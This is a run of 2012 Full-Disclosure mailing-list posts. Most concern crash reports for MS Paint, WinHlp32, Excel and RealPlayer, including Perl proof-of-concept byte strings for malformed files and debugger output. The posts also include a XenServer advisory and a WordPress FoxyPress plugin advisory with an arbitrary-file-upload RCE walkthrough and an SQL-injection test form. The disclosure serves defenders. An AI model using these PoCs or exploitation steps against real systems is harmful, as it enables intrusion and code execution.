Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
Antony if u wanna do my home work i suggest you to find the offset where cause the crash change some byte and play with come back when there is not second chance ,instruction is not valid and it references not valid data. Instead of spamming On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list! I want to warn you about Microsoft Paint 5.1 memory corruption Be safe Kaveh Ghaemmaghami aka (coolkaveh) -- #!/usr/bin/perl #Title: Microsoft Paint 5.1 memory corruption #Version : build 2600.xpsp Service Pack3 #Date : 2012-10-21 #Vendor : http://www.microsoft.com #Impact : Med/High #Contact : coolkaveh [at] rocketmail.com #Twitter : @coolkaveh #tested : XP SP3 ENG #Author : coolkaveh ### #Notice : for testing POC please run the Microsoft Pain under a debugger and then open the POC file. # #Bug : # #Memory corruption during the handling of the bmp files a context-dependent attacker can execute arbitrary code. ### #(844.cc4): Break instruction exception - code 8003 (first chance) #eax=7ffda000 ebx=0001 ecx=0002 edx=0003 esi=0004 edi=0005 #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs= efl=0246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - #ntdll!DbgBreakPoint: #7c90120e cc int 3 #0:005 g #(844.e20): Access violation - code c005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=000cab68 ebx= ecx=0276 edx=09d8 esi=000d5589 edi=000cab68 #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0 nv up ei pl nz na po nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\GDI32.dll - #GDI32!DdEntry11+0x44: #77f2f118 f3a5rep movs dword ptr es:[edi],dword ptr [esi] #0:000 k #*** ERROR: Module load completed but symbols could not be loaded for C:\WINDOWS\system32\mspaint.exe #ChildEBP RetAddr #WARNING: Stack unwind information not available. Following frames may be wrong. #0007efb0 0101235e GDI32!DdEntry11+0x44 #0007f024 0100a666 mspaint+0x1235e #0007f04c 0102284e mspaint+0xa666 #0007f07c 01022af6 mspaint+0x2284e #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\MFC42u.DLL - #0007f100 5f801bc5 mspaint+0x22af6 #0007f120 5f801b36 MFC42u!Ordinal6370+0x22 #0007f180 5f802f6c MFC42u!Ordinal1108+0x91 #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34 #0007f210 5f81424a MFC42u!Ordinal3944+0x5b #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07 #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117 #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7 #0007f300 ntdll!RtlAllocateHeap+0x117 # my $poc = \x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00. \x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80. \x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF. \xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88. \x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88. \x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71. \x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF. \xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77. \x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F. \xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8. \x8F\xF8\x88\x8F\xFF\x77\x8F\xF8\x84\x8F\xFF\xF7\xFF\x08\xF7\xFF\x7F\xF7\xFF\x47\x8F\x76\x00\x88\x88.
Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
Sir yes Sir. On Tue, Oct 30, 2012 at 2:53 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Antony if u wanna do my home work i suggest you to find the offset where cause the crash change some byte and play with come back when there is not second chance ,instruction is not valid and it references not valid data. Instead of spamming On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list! I want to warn you about Microsoft Paint 5.1 memory corruption Be safe Kaveh Ghaemmaghami aka (coolkaveh) -- #!/usr/bin/perl #Title: Microsoft Paint 5.1 memory corruption #Version : build 2600.xpsp Service Pack3 #Date : 2012-10-21 #Vendor : http://www.microsoft.com #Impact : Med/High #Contact : coolkaveh [at] rocketmail.com #Twitter : @coolkaveh #tested : XP SP3 ENG #Author : coolkaveh ### #Notice : for testing POC please run the Microsoft Pain under a debugger and then open the POC file. # #Bug : # #Memory corruption during the handling of the bmp files a context-dependent attacker can execute arbitrary code. ### #(844.cc4): Break instruction exception - code 8003 (first chance) #eax=7ffda000 ebx=0001 ecx=0002 edx=0003 esi=0004 edi=0005 #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs= efl=0246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - #ntdll!DbgBreakPoint: #7c90120e cc int 3 #0:005 g #(844.e20): Access violation - code c005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=000cab68 ebx= ecx=0276 edx=09d8 esi=000d5589 edi=000cab68 #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0 nv up ei pl nz na po nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\GDI32.dll - #GDI32!DdEntry11+0x44: #77f2f118 f3a5rep movs dword ptr es:[edi],dword ptr [esi] #0:000 k #*** ERROR: Module load completed but symbols could not be loaded for C:\WINDOWS\system32\mspaint.exe #ChildEBP RetAddr #WARNING: Stack unwind information not available. Following frames may be wrong. #0007efb0 0101235e GDI32!DdEntry11+0x44 #0007f024 0100a666 mspaint+0x1235e #0007f04c 0102284e mspaint+0xa666 #0007f07c 01022af6 mspaint+0x2284e #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\MFC42u.DLL - #0007f100 5f801bc5 mspaint+0x22af6 #0007f120 5f801b36 MFC42u!Ordinal6370+0x22 #0007f180 5f802f6c MFC42u!Ordinal1108+0x91 #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34 #0007f210 5f81424a MFC42u!Ordinal3944+0x5b #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07 #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117 #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7 #0007f300 ntdll!RtlAllocateHeap+0x117 # my $poc = \x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00. \x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80. \x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF. \xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88. \x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88. \x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71. \x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF. \xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77. \x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F. \xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8.
[Full-disclosure] RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
Hello List i want to warn u about RealPlayer 15.0.6.14 memory corruption during the handling of the 3g2 files look what awesome coolkaveh found Lets kill that bug Be safe keep it priv8 Title: RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability Version : 15.0.6.14 Date : 2012-10-29 Vendor : http://www.real.com/ crash: http://img543.imageshack.us/img543/9130/pocm.jpg Impact : High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested : windows 7 x64 Author : coolkaveh ### Bug : Memory corruption during the handling of the 3g2 files context-dependent Successful exploits can allow attackers to execute arbitrary code (f84.8c8): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=040d1370 ebx=7fdfe2d0 ecx=0a67f798 edx=0a67f7a8 esi= edi=0004 eip=66fc94df esp=3c6c1a80 ebp=0a67f764 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Real\RealPlayer\codecs\dmp4.dll - dmp4!GetGUID+0x1836f: 66fc94df 8944241cmov dword ptr [esp+1Ch],eax ss:002b:3c6c1a9c= 0:029 !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x3c6c1a9c First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005) Exception Sub-Type: Write Access Violation Exception Hash (Major/Minor): 0x247c7f22.0x247c7f63 Stack Trace: dmp4!GetGUID+0x1836f Instruction Address: 0x66fc94df Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at dmp4!GetGUID+0x0001836f (Hash=0x247c7f22.0x247c7f63) User mode write access violations that are not near NULL are exploitable. Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Context IS Advisory - Citrix XenServer Hypervisor Privilege Escalation
==ADVISORY=== Systems Affected: Citrix XenServer 5.0 through 6.0.2 Severity:High Category: Privilege Escalation Author: Context Information Security Reported to vendor: 24th May 2012 Advisory Issued: 30th October 2012 Reference:CVE-2012-4606 ==ADVISORY=== Description --- The XenServer remote VNC terminal emulator contains a vulnerability which would allow a user of a guest VM to get code executing in the hypervisor leading to elevation of privilege on the server on which the guest VM was being hosted. Analysis Citrix XenServer is distributed with a VT100 terminal emulator which is exposed via the VNC protocol to allow a remote user to administer their hosted para-virtualised machine. The application does not correctly handle certain escape sequences which can lead to an unprivileged guest VM being able to gain code execution in the fully privileged Dom0 allowing the entire hosting server to be controlled. It should be noted that the vulnerable code was also used in the QEMU-KVM terminal that can be used by emulated virtual machines; this is under a different CVE, CVE-2012-3515. Technologies Affected - Citrix XenServer 6.0 Citrix XenServer 5.6 Citrix XenServer 5.5 Citrix XenServer 5.0 Vendor Response -- Vendor issued a security hot fix of the 5th September 2012. See http://support.citrix.com/article/CTX134708 for support information and download locations for different versions of XenServer. Disclosure Timeline --- 24th May 2012 – Vendor notified 5th September 2012 – Vendor issues fix Credits --- James Forshaw of Context Information Security About Context Information Security -- Context Information Security is an independent security consultancy specialising in both technical security and information assurance services. The company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants. The company’s client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations. The best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report. Web:www.contextis.com Email: disclos...@contextis.co.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
is the GNAA he's referring to the same trolls we all know and love? On Oct 29, 2012 6:02 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Oct 29, 2012 at 5:54 PM, Peter Ferrie peter.fer...@gmail.com wrote: No, it costs a lot of time and money to fix even one issue. We don't want to waste it on something that isn't exploitable. There are at least four problems with this argument. First, the argument basically says defective software is OK. You've interpreted don't want to waste it as won't fix it, extended it to suggest that it's an acceptable response, and then proceeded to attack that conclusion. Do you call the fire brigade if you see the smoke from a candle? No, but you might get someone in eventually to clean the soot from the ceiling. Secure is an immigrant property of the system (http://www.mail-archive.com/sc-l@securecoding.org/msg03639.html). How can the program be secure if its not even stable? Worst, its CompSci 101 mistakes - lack of parameter validation and failure to check return values - and not some clever attack. To add insult to injury, compiler warning, static analysis and dynamic analysis will often report the issues but they are not used or ignored. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
What tool and method are you using to spot all these bugs at ms products? On Mon, Oct 29, 2012 at 1:12 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: thank you Jeff please tell me this is not exploitable http://www.exploit-db.com/exploits/22237/ -- all crashes which i gave i know is not that easy to exploit i just wanted to Proof how easy is to crash MS and i wanted to know MS opinion about any flaws so i am not going to give any crashes free as far as i can sell it to ZDI which i know is exploitable or i can exploit it for proof of concept And i will leave other crashes to exploit dev expert and crash analyzer to exploit it and enjoying flaws thank you every one for share Best Regards On Mon, Oct 29, 2012 at 5:47 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list Dear Peter and others please take a look @ it Best Regards Kaveh Ghaemmaghami Title : Microsoft Office Excel 2010 memory corruption Version : Microsoft Office professional Plus 2010 Date : 2012-10-27 Vendor: http://office.microsoft.com Impact: Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested: XP SP3 ENG ### Bug : memory corruption during the handling of the xls files a context-dependent attacker can execute arbitrary code (need investigate ) (b4c.1350): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0584 ebx=00135070 ecx=1000 edx=105f esi=06a80800 edi=0040 eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe - Excel!Ordinal40+0x1ce0d0: 301ce0d0 668b5008mov dx,word ptr [eax+8] ds:0023:058c= Proof of concept included. http://www36.zippyshare.com/v/48422905/file.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
On 30 October 2012 03:31, Kelvin White kelvin.whit...@gmail.com wrote: is the GNAA he's referring to the same trolls we all know and love? could there be any other? mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Help program (WinHlp32.exe) memory corruption
I was looking and appear that this bug was fixed a long time ago at ms, also windows help (.hlp) do not appear to be automatic opened in windows vista and later. On Sat, Oct 27, 2012 at 2:38 PM, Gynvael Coldwind gynv...@coldwind.plwrote: Hi Kaveh, Mario has a point. Why do you care about any bug in winhlp if by design you can embed a DLL file in the .hlp file and run arbitrary code? See e.g. Wikipedia http://en.wikipedia.org/wiki/WinHelp#WinHelp_appearance_and_features: A rather security critical feature is that one can also include a DLL file containing custom code and associating it with WinHelp topics. Effectively this makes .HLP files equivalent to executables. There is no sense in finding bugs in WinHlp32.exe - it already is known that hlp=exe, by design. On Sat, Oct 27, 2012 at 9:55 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hi Dear Sir, I have reached 12 crashes during Microsoft Windows Help program test. I can discuss with authority responsible Best Regards On Sat, Oct 27, 2012 at 2:45 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list! I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption Best Regards Kaveh Ghaemmaghami aka (coolkaveh) - #!/usr/bin/perl #Title: Microsoft Windows Help program(WinHlp32.exe)memory corruption #Version : 5.1.2600 #Date : 2012-10-21 #Vendor : http://www.microsoft.com #Crash: http://img69.imageshack.us/img69/7652/helpview.jpg #Impact : Med/High #Contact : coolkaveh [at] rocketmail.com #Twitter : @coolkaveh #tested : XP SP3 ENG #Author : coolkaveh ### #Info : # #The HLP file is Microsoft Help file documentation for the Windows operating system or Windows programs. #The file contains documentation for the Windows operating system or Windows programs. # #Bug : # #Memory corruption during the handling of the hlp files by Microsoft Windows default #help viewer (WinHlp32.exe) #Successful exploits can allow attackers to execute arbitrary code ### #(f3c.e64): Access violation - code c005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax= #ebx=000a3d08 #ecx=3fffeb6b #edx=0003 #esi=000a8fa8 #edi=000a9000 #eip=77c47380 #esp=0007f528 #ebp=0007f530 iopl=0 nv up ei pl nz ac po nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010212 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - #msvcrt!memmove+0xd0: #77c47380 f3a5rep movs dword ptr es:[edi],dword ptr [esi] #1:001!exploitable -v #First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005) #Exception Sub-Type: Write Access Violation #Description: User Mode Write AV #Short Description: WriteAV #Exploitability Classification: EXPLOITABLE #Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memmove+0x00d0 (Hash=0x613a0f0c.0x41551815) #User mode write access violations that are not near NULL are exploitable. ### my $poc = \x3F\x5F\x03\x00\x95\x03\x00\x00\xFF\xFF\xFF\xFF\xB8\x11\x00\x00\x85\x03\x00\x00\x7C\x03\x00\x00\x00. \x6C\x03\x21\x00\x01\x00\xB6\x50\xAF\x36\x00\x00\x01\x00\x0D\x00\x57\x69\x6E\x64\x6F\x77\x73\x20\x32. \x30\x30\x30\x00\x03\x00\x04\x00\x00\x00\x00\x00\x02\x00\x25\x00\x57\x65\x64\x6E\x65\x73\x64\x61\x79. \x2C\x20\x4A\x61\x6E\x75\x61\x72\x79\x20\x32\x37\x2C\x20\x31\x39\x39\x39\x20\x30\x39\x3A\x34\x35\x3A. \x32\x36\x00\x04\x00\x05\x00\x43\x53\x28\x29\x00\x04\x00\x05\x00\x43\x53\x28\x29\x00\x06\x00\x5A\x00. \x7F\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x72\x6F\x63\x34\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8D\x02\x66. \x00\x68\x01\x58\x02\x04\x00\xFF\xFF\xE2\x00\xC0\xC0\xC0\x00\x06\x00\x5A\x00\x7F\x0F\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x74\x72\x6F\x75\x62\x6C\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.
[Full-disclosure] Hack In Paris CFP 2013
Introduction Since 2004, Sysdream and HZV have organized the Nuit du Hack event in Paris, France. After the success of this year with more than 1200 attendees, we are planning a more International and corporate event. Aiming to bring together security professionals and enthusiasts, Hack In Paris will focus on the latest advances in IT security. Hack In Paris will be held at Disneyland Paris Conference Centre from June 17th to 21st of 2013. The Nuit Du Hack will take place from 22nd to 23rd of June 2013 at Disneyland Paris too. This place is easily accessible by train (15mn ride) from downtown Paris and airports. Topics == The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research or your topic are not listed here. - Vulnerability research and exploitation - Penetration testing and security assessment - Malware analysis and new trends in malicious codes - Forensics, IT crime law enforcement - Privacy issues: LOPPSI, HADOPI, ... - Low-level hacking (console security mobile devices) - Risk management and ISO 27001 - BYOD - Social Engineering How to submit? == Submissions should contain the following elements: - The biography of each author - A short description (abstract) of your presentation - The summary of your research, including technical information in particular novel research with regards to the state of the art - An estimation of your expenses (trip and hotel) Please send your proposal to cfp[at]hackinparis[dot]com. Note: presentations will take about 45 minutes, including 5 to 10 minutes of questions. All submissions will be reviewed by our program committee. Authors will be notified upon acceptance of their talk. Upcoming dates == October 1 : CFP announced February 22 : Submission deadline March 4 : Notification sent to authors March 5 : Program announcement June 17-21 : Hack In Paris June 22 : Nuit Du Hack Trainings = We are also looking for experienced professionals to give three days of trainings. Contact trainings[at]hackinparis[dot]com. Contact Social Media == Contact : info[at]hackinparis[dot]com Twitter : http://twitter.com/hackinparis Facebook : http://www.facebook.com/pages/Hack-In-Paris/134611446603792 Linkedin : http://www.linkedin.com/groups?gid=3750882 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Excel 2010 memory corruption
On 30 October 2012 11:22, Julius Kivimäki julius.kivim...@gmail.com wrote: Greater Nashville Apartment Association http://www.nashvilleaptasn.org/ Great North Air Ambulance http://www.greatnorthairambulance.co.uk/ ohSeven meight you young 'uns with your fancy dubyadubyadubya indexing and querying the subsequent dataset skills you got me but good!!!11!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
[waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin === Author: Janek Vind waraxe Date: 30. October 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-95.html Description of vulnerable target: ~~~ FoxyPress is a FREE shopping cart and product management tool that integrates with FoxyCart's e-commerce solution to help you get your store up and running quickly and efficiently. http://wordpress.org/extend/plugins/foxypress/ Affected version: 0.4.2.5 ### 1. Arbitrary File Upload Vulnerability in documenthandler.php ### Reasons: Missing security checks in file upload functionality Attack vectors: Uploaded file Preconditions: Logged in as admin with FoxyPress product editing privileges Php script documenthandler.php line 14: [ source code start ]-- if (!empty($_FILES)) { ... $targetpath = ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR; ... $newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id, $targetpath, $prefix); $targetpath = $targetpath . $newfilename; if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath)) [ source code end ] As we can see above, there is no security checks against uploaded file. As result, attacker is able to upload files with arbitrary extension to remote system. In case of php files this vulnerability leads to RCE (Remote Code Execution). Test: 1. Open product editing webpage: http://localhost/wp342/wp-admin/post.php?post=43action=edit 2. Look for Digital Downloads. Insert some number to the input box below: Max Downloads allowed (if you need to override the main setting). 3. There must be Browse Files button (Flash-based). Choose the php file, you want to upload. We can observe AJAX in action and as result download link appears: http://localhost/wp342/wp-content/inventory_downloadables/my_download_jw82ku0jz9_43.php Opening that download link will execute previously uploaded php file. ### 2. SQL Injection Vulnerability in documenthandler.php ### Reasons: Insufficient sanitization of user-supplied data Attack vectors: User-supplied POST parameter prefix Preconditions: Logged in as admin with FoxyPress product editing privileges Php script documenthandler.php line 14: [ source code start ]-- if (!empty($_FILES)) { $inventory_id = intval( $_POST['inventory_id'] ); $downloadabletable = $_POST['prefix']; ... $query = INSERT INTO . $downloadabletable . SET inventory_id=' . $inventory_id . ', filename=' . mysql_escape_string($newfilename) . ', maxdownloads= ' . mysql_escape_string($downloadablemaxdownloads) . ', status = 1; $wpdb-query($query); [ source code end ] We can see, that user-supplied POST parameter prefix in used in subsequent SQL INSERT INTO query as table name. There is no input data sanitization, therefore attacker is able to insert any data to any tables in current database. Test (parameter security must be valid): -[ test code start ]--- htmlbodycenter form action=http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_downloadsecurity=844b64ce45; method=post enctype=multipart/form-data input type=file name=Filedata input type=hidden name=downloadablemaxdownloads value=1 input type=hidden name=prefix value=waraxe input type=submit value=Test /form /center/body/html --[ test code end ] Result (Wordpress must be set to show SQL errors): WordPress database error: [Table 'wp342.waraxe' doesn't exist] INSERT INTO waraxe SET inventory_id='0', filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1 ### 3. SQL Injection Vulnerability in foxypress-manage-emails.php ### Reasons: Insufficient sanitization of user-supplied data Attack vectors: User-supplied GET parameter id Preconditions: Logged in as admin with FoxyPress management privileges Php script foxypress-manage-emails.php line 14: [ source code start ]-- function foxypress_manage_emails_page_load() { global $wpdb; if(isset($_GET['mode'])
Re: [Full-disclosure] RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
You can be mistaken for a troller, that's for sure, but I know you're just very stupid. On Tue, Oct 30, 2012 at 5:37 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello List i want to warn u about RealPlayer 15.0.6.14 memory corruption during the handling of the 3g2 files look what awesome coolkaveh found Lets kill that bug Be safe keep it priv8 Title: RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability Version : 15.0.6.14 Date : 2012-10-29 Vendor : http://www.real.com/ crash: http://img543.imageshack.us/img543/9130/pocm.jpg Impact : High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested : windows 7 x64 Author : coolkaveh ### Bug : Memory corruption during the handling of the 3g2 files context-dependent Successful exploits can allow attackers to execute arbitrary code (f84.8c8): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=040d1370 ebx=7fdfe2d0 ecx=0a67f798 edx=0a67f7a8 esi= edi=0004 eip=66fc94df esp=3c6c1a80 ebp=0a67f764 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Real\RealPlayer\codecs\dmp4.dll - dmp4!GetGUID+0x1836f: 66fc94df 8944241cmov dword ptr [esp+1Ch],eax ss:002b:3c6c1a9c= 0:029 !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x3c6c1a9c First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005) Exception Sub-Type: Write Access Violation Exception Hash (Major/Minor): 0x247c7f22.0x247c7f63 Stack Trace: dmp4!GetGUID+0x1836f Instruction Address: 0x66fc94df Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at dmp4!GetGUID+0x0001836f (Hash=0x247c7f22.0x247c7f63) User mode write access violations that 